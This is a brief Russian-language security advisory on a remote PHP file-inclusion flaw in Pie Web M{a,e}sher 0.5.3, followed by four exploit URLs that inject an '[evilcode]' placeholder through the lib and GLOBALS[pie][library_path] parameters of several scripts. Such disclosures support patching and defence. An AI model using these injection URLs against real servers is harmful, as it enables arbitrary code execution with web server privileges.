Программа: Pie Web M{a,e}sher 0.5.3

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных множественными сценариями. Удаленный пользователь может выполнить
произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Эксплоит:

http://localhost/[path]/lib/action/alias.php?lib=[evilcode]
http://localhost/[path]/lib/class/diff.php?GLOBALS[pie][library_path]=[evilcode]
http://localhost/[path]/libcompiler/html.php?GLOBALS[pie][library_path]=[evilcode]
http://localhost/[path]/lib/share/auth.php?GLOBALS[pie][library_path]=[evilcode]



Оставить мнение